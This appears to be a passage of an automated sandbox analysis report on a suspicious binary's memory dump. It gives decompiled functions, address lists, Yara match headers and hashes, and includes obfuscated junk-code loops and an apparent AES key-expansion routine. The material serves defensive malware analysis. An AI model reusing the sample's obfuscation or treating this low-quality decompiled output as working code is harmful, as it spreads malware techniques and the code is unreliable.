                                                          0x0041c01c
                                                          0x0041c022
                                                          0x0041c029
                                                          0x0041c02a
                                                          0x0041c030
                                                          0x0041c037
                                                          0x0041c03c
                                                          0x0041c03f
                                                          0x0041c045
                                                          0x0041c045
                                                          0x0041c045
                                                          0x0041c04b
                                                          0x0041c051
                                                          0x0041c052
                                                          0x0041c058
                                                          0x0041c05e
                                                          0x0041c064
                                                          0x0041c067
                                                          0x0041c06d
                                                          0x0041c073
                                                          0x0041c073
                                                          0x0041c079
                                                          0x0041c07f
                                                          0x0041c085
                                                          0x0041c08b
                                                          0x0041c091
                                                          0x0041c094
                                                          0x0041c099
                                                          0x0041c09f
                                                          0x0041c0a5
                                                          0x0041c0ab
                                                          0x0041c0ac
                                                          0x0041c0b2
                                                          0x0041c0b3
                                                          0x0041c0b6
                                                          0x0041c0bb
                                                          0x0041c0c2
                                                          0x0041c0c3
                                                          0x0041c0c9
                                                          0x0041c0d1
                                                          0x0041c0d8
                                                          0x0041c0de
                                                          0x0041c0e4
                                                          0x0041c0e5
                                                          0x0041c0e5
                                                          0x0041c0eb
                                                          0x0041c0f1
                                                          0x0041c0f7
                                                          0x0041c0fd
                                                          0x0041c103
                                                          0x0041c109
                                                          0x0041c109
                                                          0x0041c109
                                                          0x0041c10f
                                                          0x0041c11b
                                                          0x0041c120
                                                          0x0041c121
                                                          0x0041c128
                                                          0x0041c12e
                                                          0x0041c134
                                                          0x0041c13a
                                                          0x0041c13b
                                                          0x0041c143
                                                          0x0041c149
                                                          0x0041c14a
                                                          0x0041c150
                                                          0x0041c151
                                                          0x0041c157
                                                          0x0041c160
                                                          0x0041c167
                                                          0x0041c16a
                                                          0x0041c16b
                                                          0x0041c171
                                                          0x0041c171
                                                          0x0041c177
                                                          0x0041c17d
                                                          0x0041c17e
                                                          0x0041c17f
                                                          0x0041c180
                                                          0x0041c186
                                                          0x0041c18c
                                                          0x0041c192
                                                          0x0041c198
                                                          0x0041c19d
                                                          0x0041c1a0
                                                          0x0041c1a1
                                                          0x0041c1a2
                                                          0x0041c1a2
                                                          0x0041c1a2
                                                          0x0041c1a3
                                                          0x0041c1a9
                                                          0x0041c1af
                                                          0x0041c1b5
                                                          0x0041c1bb
                                                          0x0041c1bb
                                                          0x0041c180
                                                          0x0041c0eb
                                                          0x0041c085
                                                          0x0041c079
                                                          0x0041c052
                                                          0x0041bfcf
                                                          0x0041bf54
                                                          0x0041b496
                                                          0x0041b496
                                                          0x0041b4a2
                                                          0x0041b4a3
                                                          0x0041b4a9
                                                          0x0041b4b0
                                                          0x0041b4b6
                                                          0x0041b4bd
                                                          0x0041b4c3
                                                          0x0041b4c9
                                                          0x0041b4d0
                                                          0x0041b4d9
                                                          0x0041b4da
                                                          0x0041b4e1
                                                          0x0041b4e7
                                                          0x0041b4ed
                                                          0x0041b4f8
                                                          0x0041b4fe
                                                          0x0041b504
                                                          0x0041b50b
                                                          0x0041b50b
                                                          0x0041b511
                                                          0x0041b518
                                                          0x0041b51e
                                                          0x0041b524
                                                          0x0041b52b
                                                          0x0041b531
                                                          0x0041b532
                                                          0x0041b539
                                                          0x0041b53a
                                                          0x0041b540
                                                          0x0041b546
                                                          0x0041b552
                                                          0x0041b558
                                                          0x0041b55e
                                                          0x0041b56a
                                                          0x0041b56b
                                                          0x0041b571
                                                          0x0041b572
                                                          0x0041b582
                                                          0x0041b58f
                                                          0x0041b595
                                                          0x0041b59b
                                                          0x0041b5a7
                                                          0x0041b5aa
                                                          0x0041b5b1
                                                          0x0041b5b7
                                                          0x0041b5b8
                                                          0x0041b5be
                                                          0x0041b5c5
                                                          0x0041b5ca
                                                          0x0041b5d0
                                                          0x0041b5d6
                                                          0x0041b5dc
                                                          0x0041b5e8
                                                          0x0041b5ee
                                                          0x0041b5fa
                                                          0x0041b600
                                                          0x0041b60a
                                                          0x0041b610
                                                          0x0041b61c
                                                          0x0041b622
                                                          0x0041b629
                                                          0x0041b63b
                                                          0x0041b63e
                                                          0x0041b644
                                                          0x0041b64a
                                                          0x0041b64b
                                                          0x0041b651
                                                          0x0041b652
                                                          0x0041b658
                                                          0x0041b664
                                                          0x0041b665
                                                          0x0041b66c
                                                          0x0041b672
                                                          0x0041b678
                                                          0x0041b682
                                                          0x0041b688
                                                          0x0041b694
                                                          0x0041b695
                                                          0x0041b69b
                                                          0x0041b69c
                                                          0x0041b69d
                                                          0x0041b6a3
                                                          0x0041b6aa
                                                          0x0041b6b0
                                                          0x0041b6b2
                                                          0x0041b6bf
                                                          0x0041b6c5
                                                          0x0041b6d8
                                                          0x0041b6de
                                                          0x0041b6e4
                                                          0x0041b6ea
                                                          0x0041b6eb
                                                          0x0041b6ed
                                                          0x0041b6f3
                                                          0x0041b6f9
                                                          0x0041b6ff
                                                          0x0041b705
                                                          0x0041b70b
                                                          0x0041b70c
                                                          0x0041b712
                                                          0x0041b718
                                                          0x0041b725
                                                          0x0041b72b
                                                          0x0041b739
                                                          0x0041b740
                                                          0x0041b747
                                                          0x0041b75d
                                                          0x0041b764
                                                          0x0041b765
                                                          0x0041b76c
                                                          0x0041b76d
                                                          0x0041b773
                                                          0x0041b785
                                                          0x0041b791
                                                          0x0041b797
                                                          0x0041b79d
                                                          0x0041b7b3
                                                          0x0041b7ba
                                                          0x0041b7bb
                                                          0x0041b7c1
                                                          0x0041b7c3
                                                          0x0041b7cf
                                                          0x0041b7d7
                                                          0x0041b7dd
                                                          0x0041b7de
                                                          0x0041b7e4
                                                          0x0041b7ea
                                                          0x0041b7f0
                                                          0x0041b800
                                                          0x0041b812
                                                          0x0041b813
                                                          0x0041b819
                                                          0x0041b81f
                                                          0x0041b825
                                                          0x0041b82b
                                                          0x0041b837
                                                          0x0041b838
                                                          0x0041b83d
                                                          0x0041b83e
                                                          0x0041b841
                                                          0x0041b841
                                                          0x0041b82b
                                                          0x0041b7f0
                                                          0x0041b725
                                                          0x0041b70c
                                                          0x0041b682
                                                          0x0041b658
                                                          0x0041b60a
                                                          0x0041b5fa
                                                          0x0041b572
                                                          0x0041b55e
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1f6be894e6ee49a008ac94e50c0be53ee36e95cfc2f65e22ce418f248538abbd
                                                          • Instruction ID: 76b40ba84f61c931757f972c52590b39c50eeaf0436a0eca26feb11d68498430
                                                          • Opcode Fuzzy Hash: 1f6be894e6ee49a008ac94e50c0be53ee36e95cfc2f65e22ce418f248538abbd
                                                          • Instruction Fuzzy Hash: 2B02D972808391CFE706CF38C99AB823FB5F30A324B08434ED9A197592D774656ACF85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041B496, Relevance: .2, Instructions: 182COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E0041B496() {
				signed int _t26;
				signed int _t27;
				void* _t33;
				signed int _t35;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t52;
				signed int _t53;
				signed char _t54;
				signed char _t55;
				void* _t56;
				intOrPtr _t62;
				signed int _t65;
				signed char _t67;
				signed int _t69;
				signed int _t74;
				signed int _t76;
				signed int _t83;
				signed int _t85;
				intOrPtr _t88;
				signed int _t90;
				signed int _t91;
				signed int _t98;

				L0:
				_push(_t62);
				_t27 = _t26 &  *0x4b550def;
				_push(_t27);
				 *0x6ab7e3b7 = _t62;
				 *0x600ce4f9 =  *0x600ce4f9 >> 0x1d;
				_t53 = _t52 -  *0x6ab9a5b2;
				asm("rol dword [0x870b336], 0x35");
				asm("rol dword [0xe44d3266], 0x10");
				_push(_t53);
				asm("rol dword [0x1d590531], 0xff");
				asm("adc [0xd9f46f6], bl");
				_t65 =  *0x6ab7e3b7 - 0xffffffffc64be17c;
				 *0x49d7d139 =  *0x49d7d139 | _t76;
				asm("sbb [0x574a13e4], ah");
				 *0xa2f85b12 = _t27 - 0x3454fd67;
				asm("sbb ah, [0x4d4445e2]");
				_t85 =  *0x9f8a858d;
				 *0x9f8a858d = _t83 |  *0x637c809;
				asm("rol dword [0xa8c0ba9e], 0x1a");
				asm("adc [0xdcfd40bf], ebx");
				asm("rcr byte [0x61d063e4], 0x6f");
				_t54 = _t53 &  *0x9fe4a5be;
				 *0xdbd7fe0a =  *0xdbd7fe0a >> 0x51;
				asm("lodsd");
				asm("sbb [0xbb63f084], ah");
				 *0x8e096699 =  *0x8e096699 ^ _t98;
				if( *0x8e096699 <= 0 && (_t85 ^ 0xbeea6505) != 0) {
					_pop(_t33);
					asm("adc bl, [0x9f061214]");
					asm("scasd");
					if(( *0xe10a9f74 & _t65) > 0) {
						 *0xef0f32f7 =  *0xef0f32f7 >> 0x2f;
						asm("adc edi, 0x9acac10f");
						asm("rcr dword [0x53ce4a35], 0xb4");
						_t55 = _t54 | 0x00000012;
						 *0x356a7a91 =  *0x356a7a91 >> 0x8b;
						 *0xd54e9fde =  *0xd54e9fde & _t98;
						asm("stosb");
						asm("adc esp, [0x53c16b96]");
						 *0xaacca300 =  *0xaacca300 << 0xa6;
						asm("sbb bl, [0xa9b9faa2]");
						_t45 =  *0xa66687e * 0x39f1 -  *0x4cc05705;
						 *0xfcd19325 =  *0xfcd19325 + _t55;
						 *0x17764bcf =  *0x17764bcf + _t33;
						_push( *0x1a3e9ec7);
						if( *0xaaf62fbc < 0xb9c32b03) {
							_t35 =  *0xcd1a597d * 0x4a0c;
							if(_t35 < 0) {
								asm("sbb al, [0x4434ff32]");
								 *0x42cc7220 =  *0x42cc7220 << 8;
								asm("sbb [0xfc08fba1], esp");
								asm("sbb dh, 0x18");
								asm("adc [0x3d021ba9], edx");
								 *0x6725431d =  *0x6725431d ^ _t98;
								_push(_t45);
								_t67 =  *0xa73b883a;
								_t56 = _t55 + 1;
								asm("adc eax, [0xa979ed5]");
								if(_t56 != 0) {
									asm("scasb");
									 *0x1621e34 =  *0x1621e34 >> 0x62;
									asm("adc bl, [0x64b3ad86]");
									_t88 =  *0xadbb6405;
									asm("ror byte [0xc89fd386], 0x68");
									if((_t67 & 0x00000000) != 0) {
										asm("adc edi, [0xdb362674]");
										asm("lodsd");
										_t46 = _t45 - 1;
										_push(_t46);
										asm("sbb [0x70c3fbf5], ebp");
										asm("rcr dword [0xaabc309a], 0x56");
										 *0x22ec1c2f =  *0x22ec1c2f - _t56 -  *0x28269116;
										asm("cmpsw");
										asm("ror byte [0xc62de200], 0x9b");
										 *0x1b639525 =  *0x1b639525 ^ _t35;
										 *0xeea6ed67 =  *0xeea6ed67 >> 0x68;
										_push( *0xd953adc4);
										asm("sbb [0xd6b59bec], ebx");
										asm("movsw");
										 *0xadb909d2 =  *0xadb909d2 | _t67;
										asm("adc ecx, [0xbef2efe]");
										 *0xe48e1fb0 =  *0xe48e1fb0 ^ _t67;
										_t74 =  *0xa77219d;
										_t90 = _t88 - 0x3e73a46d;
										if(_t90 >= 0) {
											_t91 = _t90 & 0x9d0b9672;
											 *0x4f57c95 =  *0x4f57c95 >> 0x5e;
											if( *0x4d0b74c7 >= _t98) {
												asm("ror dword [0x730e9672], 0x57");
												asm("adc [0x96aabe6c], eax");
												asm("ror byte [0xee470b2], 0xd7");
												 *0xe01a5b3c =  *0xe01a5b3c >> 0xd7;
												 *0x144e4412 =  *0x144e4412 << 0xd4;
												 *0x2c6a426 =  *0x2c6a426 >> 0xfb;
												_t47 = _t46;
												_push( *0x86d1c103);
												asm("sbb ebx, [0xa2b77e62]");
												 *0x3abcc95 = _t91;
												_t69 =  *0x31167269 * 0x39b1;
												asm("ror dword [0x8067e531], 0xb2");
												 *0x24ff31c5 = _t47 + 0xe4e6e109 ^  *0xe267f110;
												asm("movsw");
												 *0x746bfcc =  *0x3abcc95;
												asm("rol dword [0x9aedc17], 0xbf");
												asm("sbb [0x6a965c96], esi");
												asm("sbb [0x65afcbf5], esi");
												if( *0x24ff31c5 -  *0x5ed1850d <= 0) {
													 *0xd25ff61f =  *0xd25ff61f ^ _t74;
													asm("adc eax, [0x23f0bb21]");
													asm("adc [0x1691aaf8], edx");
													if((_t74 ^  *0xf4e0fe03) >= 0) {
														_push(_t69);
														asm("sbb bh, 0x1c");
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L0;
			}



























                                                          0x0041b496
                                                          0x0041b4a2
                                                          0x0041b4a3
                                                          0x0041b4a9
                                                          0x0041b4b0
                                                          0x0041b4b6
                                                          0x0041b4c3
                                                          0x0041b4c9
                                                          0x0041b4d0
                                                          0x0041b4d9
                                                          0x0041b4da
                                                          0x0041b4e1
                                                          0x0041b4e7
                                                          0x0041b4ed
                                                          0x0041b4f8
                                                          0x0041b4fe
                                                          0x0041b504
                                                          0x0041b50b
                                                          0x0041b50b
                                                          0x0041b511
                                                          0x0041b51e
                                                          0x0041b524
                                                          0x0041b52b
                                                          0x0041b532
                                                          0x0041b539
                                                          0x0041b53a
                                                          0x0041b540
                                                          0x0041b546
                                                          0x0041b56a
                                                          0x0041b56b
                                                          0x0041b571
                                                          0x0041b572
                                                          0x0041b582
                                                          0x0041b58f
                                                          0x0041b59b
                                                          0x0041b5a7
                                                          0x0041b5aa
                                                          0x0041b5b1
                                                          0x0041b5b7
                                                          0x0041b5b8
                                                          0x0041b5be
                                                          0x0041b5ca
                                                          0x0041b5d0
                                                          0x0041b5d6
                                                          0x0041b5dc
                                                          0x0041b5e8
                                                          0x0041b5fa
                                                          0x0041b600
                                                          0x0041b60a
                                                          0x0041b61c
                                                          0x0041b622
                                                          0x0041b629
                                                          0x0041b63b
                                                          0x0041b63e
                                                          0x0041b644
                                                          0x0041b64a
                                                          0x0041b64b
                                                          0x0041b651
                                                          0x0041b652
                                                          0x0041b658
                                                          0x0041b664
                                                          0x0041b665
                                                          0x0041b66c
                                                          0x0041b672
                                                          0x0041b678
                                                          0x0041b682
                                                          0x0041b688
                                                          0x0041b694
                                                          0x0041b69b
                                                          0x0041b69c
                                                          0x0041b69d
                                                          0x0041b6a3
                                                          0x0041b6aa
                                                          0x0041b6b0
                                                          0x0041b6b2
                                                          0x0041b6bf
                                                          0x0041b6c5
                                                          0x0041b6de
                                                          0x0041b6e4
                                                          0x0041b6eb
                                                          0x0041b6ed
                                                          0x0041b6f9
                                                          0x0041b6ff
                                                          0x0041b705
                                                          0x0041b70b
                                                          0x0041b70c
                                                          0x0041b712
                                                          0x0041b718
                                                          0x0041b725
                                                          0x0041b72b
                                                          0x0041b739
                                                          0x0041b740
                                                          0x0041b747
                                                          0x0041b75d
                                                          0x0041b765
                                                          0x0041b76c
                                                          0x0041b76d
                                                          0x0041b785
                                                          0x0041b791
                                                          0x0041b79d
                                                          0x0041b7b3
                                                          0x0041b7bb
                                                          0x0041b7c1
                                                          0x0041b7c3
                                                          0x0041b7cf
                                                          0x0041b7d7
                                                          0x0041b7e4
                                                          0x0041b7f0
                                                          0x0041b800
                                                          0x0041b813
                                                          0x0041b825
                                                          0x0041b82b
                                                          0x0041b837
                                                          0x0041b83e
                                                          0x0041b841
                                                          0x0041b82b
                                                          0x0041b7f0
                                                          0x0041b725
                                                          0x0041b70c
                                                          0x0041b682
                                                          0x0041b658
                                                          0x0041b60a
                                                          0x0041b5fa
                                                          0x0041b572
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5743b37e582a94526212c288a2046827af3fc6eed5a07fb84574f90b5c483c7a
                                                          • Instruction ID: 49a98ff4f113671e613f24136e734eb9bb538a1b807b6f24ce4350570824fe1b
                                                          • Opcode Fuzzy Hash: 5743b37e582a94526212c288a2046827af3fc6eed5a07fb84574f90b5c483c7a
                                                          • Instruction Fuzzy Hash: E0916632848396CFD70ACF38D98AB867FBAF346720B08434ED59197092C774695ADF85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041C514, Relevance: .2, Instructions: 174COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E0041C514(void* __eax, void* __ebx, void* __edx) {
				void* _t8;

				asm("sbb eax, 0xdedfe2fc");
				L2();
				_pop(_t8);
				return _t8;
			}




                                                          0x0041c514
                                                          0x0041c520
                                                          0x0041c525
                                                          0x0041c526

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 711052b94e0168267ff8567360f9d6c763ffb7c40d43e56b567de7d93fdc100d
                                                          • Instruction ID: ffc87555c59fd56910947a42d57213bccf24e3fe4807af2a8c01681950ae6592
                                                          • Opcode Fuzzy Hash: 711052b94e0168267ff8567360f9d6c763ffb7c40d43e56b567de7d93fdc100d
                                                          • Instruction Fuzzy Hash: 308111329597D1DFE705DB78E89A7423FB2E78633074C07C9C8A25B2D2D76024AACB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402D88, Relevance: .2, Instructions: 171COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E00402D88(void* __eax, void* __ecx, void* __eflags, signed int _a4, signed int _a8, signed int _a12) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;

				if(__eflags < 0) {
					return __ecx;
				} else {
					asm("jecxz 0x17");
					_push(0x8b556c69);
					__ebp = __esp;
					__ecx = _a8;
					__eax =  *__ecx;
					__edx = _a4;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__esi = __eax;
					asm("ror esi, 0x8");
					__esi = __eax & 0xff00ff00;
					asm("rol eax, 0x8");
					 *__edx = __esi;
					__esi =  *(__ecx + 4);
					__edi = __esi;
					asm("ror edi, 0x8");
					__edi = __esi & 0xff00ff00;
					asm("rol esi, 0x8");
					 *(__edx + 4) = __edi;
					__esi =  *(__ecx + 8);
					__edi = __esi;
					asm("ror edi, 0x8");
					__edi = __esi & 0xff00ff00;
					asm("rol esi, 0x8");
					 *(__edx + 8) = __edi;
					__esi =  *(__ecx + 0xc);
					__eax = __edx + 4;
					__edi = __esi;
					asm("ror edi, 0x8");
					__edi = __esi & 0xff00ff00;
					asm("rol esi, 0x8");
					 *(__edx + 0xc) = __edi;
					__esi =  *(__ecx + 0x10);
					__edi = __esi;
					asm("ror edi, 0x8");
					__edi = __esi & 0xff00ff00;
					asm("rol esi, 0x8");
					 *(__edx + 0x10) = __edi;
					__esi =  *(__ecx + 0x14);
					__edi = __esi;
					asm("ror edi, 0x8");
					__edi = __esi & 0xff00ff00;
					asm("rol esi, 0x8");
					 *(__edx + 0x14) = __edi;
					__esi =  *(__ecx + 0x18);
					__edi = __esi;
					asm("ror edi, 0x8");
					__edi = __esi & 0xff00ff00;
					asm("rol esi, 0x8");
					 *(__edx + 0x18) = __edi;
					__ecx =  *(__ecx + 0x1c);
					__esi = __ecx;
					asm("ror esi, 0x8");
					__esi = __ecx & 0xff00ff00;
					asm("rol ecx, 0x8");
					__esi = __esi | __ecx;
					__eflags = _a12 - 0x100;
					 *(__edx + 0x1c) = __esi;
					if(_a12 != 0x100) {
						L7:
						_pop(__edi);
						_pop(__esi);
						__eax = __eax | 0xffffffff;
						__eflags = __eax;
						_pop(__ebx);
						return __eax;
					} else {
						__esi = _a4;
						__ebx = 0;
						__eflags = 0;
						_a12 = 0;
						while(1) {
							__edi =  *(__eax + 0x18);
							 *(__esi + __ebx + 0x904) & 0x000000ff = ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x10;
							__edi = __edi >> 0x10;
							__ecx = __edi >> 0x00000010 & 0x000000ff;
							__ecx =  *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4);
							__ecx =  *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000;
							__ecx =  *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010;
							__edi = __edi >> 8;
							__edx = __edi >> 0x00000008 & 0x000000ff;
							__edx =  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4);
							__edx =  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000;
							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 8;
							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000;
							__edi = __edi >> 0x18;
							__edx = __edi >> 0x00000018 & 0x000000ff;
							__edx =  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff;
							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff;
							__edx = __edi;
							__edx = __edi & 0x000000ff;
							__edx =  *(__esi + 4 + (__edi & 0x000000ff) * 4);
							__edx =  *(__esi + 4 + (__edi & 0x000000ff) * 4) & 0x0000ff00;
							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(__esi + 4 + (__edi & 0x000000ff) * 4) & 0x0000ff00;
							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(__esi + 4 + (__edi & 0x000000ff) * 4) & 0x0000ff00 ^  *(__eax - 4);
							__edx =  *__eax;
							__edx =  *__eax ^ __ecx;
							 *(__eax + 0x1c) = __ecx;
							__ecx =  *(__eax + 4);
							__ecx =  *(__eax + 4) ^ __edx;
							 *(__eax + 0x20) = __edx;
							__edx =  *(__eax + 8);
							__edx =  *(__eax + 8) ^ __ecx;
							 *(__eax + 0x24) = __ecx;
							 *(__eax + 0x28) = __edx;
							__eflags = __ebx - 6;
							if(__ebx == 6) {
								break;
							}
							__edx = __edx >> 0x18;
							__ecx = __edx >> 0x00000018 & 0x000000ff;
							__ecx =  *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4);
							__edx = __edx >> 0x10;
							__ebx = __edx >> 0x00000010 & 0x000000ff;
							__ebx =  *(__esi + 4 + (__edx >> 0x00000010 & 0x000000ff) * 4);
							__ecx =  *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000;
							__ebx =  *(__esi + 4 + (__edx >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000;
							__ecx = ( *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 8;
							__ecx = ( *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(__esi + 4 + (__edx >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000;
							__edx = __edx >> 8;
							__ebx = __edx >> 0x00000008 & 0x000000ff;
							__ebx =  *(__esi + 4 + (__edx >> 0x00000008 & 0x000000ff) * 4);
							__edx = __edx & 0x000000ff;
							__edx =  *(__esi + 5 + __edx * 4) & 0x000000ff;
							__ecx = __ecx ^ __ebx;
							__ebx = _a12;
							__ecx = __ecx ^ __edx;
							__ecx = __ecx ^  *(__eax + 0xc);
							__edx =  *(__eax + 0x10);
							__edx =  *(__eax + 0x10) ^ __ecx;
							 *(__eax + 0x2c) = __ecx;
							__ecx =  *(__eax + 0x14);
							__ecx =  *(__eax + 0x14) ^ __edx;
							 *(__eax + 0x34) = __ecx;
							__ecx = __ecx ^ __edi;
							__ebx = _a12 + 1;
							 *(__eax + 0x30) = __edx;
							 *(__eax + 0x38) = __ecx;
							__eax = __eax + 0x20;
							_a12 = __ebx;
							__eflags = __ebx - 7;
							if(__ebx < 7) {
								continue;
							} else {
								goto L7;
							}
							goto L9;
						}
						_pop(__edi);
						_pop(__esi);
						__eax = 0xe;
						_pop(__ebx);
						return 0xe;
					}
				}
				L9:
			}







                                                          0x00402d89
                                                          0x00402d1f
                                                          0x00402d8b
                                                          0x00402d8b
                                                          0x00402d8d
                                                          0x00402d91
                                                          0x00402d93
                                                          0x00402d96
                                                          0x00402d98
                                                          0x00402d9b
                                                          0x00402d9c
                                                          0x00402d9d
                                                          0x00402d9e
                                                          0x00402da0
                                                          0x00402da3
                                                          0x00402da9
                                                          0x00402db3
                                                          0x00402db5
                                                          0x00402db8
                                                          0x00402dba
                                                          0x00402dbd
                                                          0x00402dc3
                                                          0x00402dce
                                                          0x00402dd1
                                                          0x00402dd4
                                                          0x00402dd6
                                                          0x00402dd9
                                                          0x00402ddf
                                                          0x00402dea
                                                          0x00402ded
                                                          0x00402df0
                                                          0x00402df3
                                                          0x00402df5
                                                          0x00402df8
                                                          0x00402dfe
                                                          0x00402e09
                                                          0x00402e0c
                                                          0x00402e0f
                                                          0x00402e11
                                                          0x00402e14
                                                          0x00402e1a
                                                          0x00402e25
                                                          0x00402e28
                                                          0x00402e2b
                                                          0x00402e2d
                                                          0x00402e30
                                                          0x00402e36
                                                          0x00402e41
                                                          0x00402e44
                                                          0x00402e47
                                                          0x00402e49
                                                          0x00402e4c
                                                          0x00402e52
                                                          0x00402e5d
                                                          0x00402e60
                                                          0x00402e63
                                                          0x00402e65
                                                          0x00402e68
                                                          0x00402e6e
                                                          0x00402e77
                                                          0x00402e79
                                                          0x00402e80
                                                          0x00402e83
                                                          0x00402f9d
                                                          0x00402f9d
                                                          0x00402f9e
                                                          0x00402f9f
                                                          0x00402f9f
                                                          0x00402fa2
                                                          0x00402fa4
                                                          0x00402e89
                                                          0x00402e89
                                                          0x00402e8c
                                                          0x00402e8c
                                                          0x00402e8e
                                                          0x00402e91
                                                          0x00402e91
                                                          0x00402e9c
                                                          0x00402ea1
                                                          0x00402ea4
                                                          0x00402eaa
                                                          0x00402eae
                                                          0x00402eb4
                                                          0x00402eb8
                                                          0x00402ebb
                                                          0x00402ec1
                                                          0x00402ec5
                                                          0x00402ecb
                                                          0x00402ece
                                                          0x00402ed2
                                                          0x00402ed5
                                                          0x00402edb
                                                          0x00402ee0
                                                          0x00402ee2
                                                          0x00402ee4
                                                          0x00402eea
                                                          0x00402eee
                                                          0x00402ef4
                                                          0x00402ef6
                                                          0x00402ef9
                                                          0x00402efb
                                                          0x00402efd
                                                          0x00402f00
                                                          0x00402f03
                                                          0x00402f05
                                                          0x00402f08
                                                          0x00402f0b
                                                          0x00402f0d
                                                          0x00402f10
                                                          0x00402f13
                                                          0x00402f16
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f1e
                                                          0x00402f21
                                                          0x00402f27
                                                          0x00402f2d
                                                          0x00402f30
                                                          0x00402f36
                                                          0x00402f3a
                                                          0x00402f40
                                                          0x00402f46
                                                          0x00402f49
                                                          0x00402f4d
                                                          0x00402f50
                                                          0x00402f56
                                                          0x00402f5a
                                                          0x00402f60
                                                          0x00402f6b
                                                          0x00402f6d
                                                          0x00402f70
                                                          0x00402f72
                                                          0x00402f75
                                                          0x00402f78
                                                          0x00402f7a
                                                          0x00402f7d
                                                          0x00402f80
                                                          0x00402f82
                                                          0x00402f85
                                                          0x00402f87
                                                          0x00402f88
                                                          0x00402f8b
                                                          0x00402f8e
                                                          0x00402f91
                                                          0x00402f94
                                                          0x00402f97
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f97
                                                          0x00402fa5
                                                          0x00402fa6
                                                          0x00402fa7
                                                          0x00402fac
                                                          0x00402fae
                                                          0x00402fae
                                                          0x00402e83
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 322dc74bc4bb893de8744513ad1f25bbe43ccbba2ee5669ae37d7c9a4cdc7b5a
                                                          • Instruction ID: 7ec915186d1db69848ee20b50fc29f96de06998a9c1ab2823541a561b37add08
                                                          • Opcode Fuzzy Hash: 322dc74bc4bb893de8744513ad1f25bbe43ccbba2ee5669ae37d7c9a4cdc7b5a
                                                          • Instruction Fuzzy Hash: ED519473E14A214FD318CF09CC40631B792EFD8312B5B81BEDD199B397CE74A9529A90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041C527, Relevance: .2, Instructions: 170COMMONCrypto
                                                          Download Yara Rule
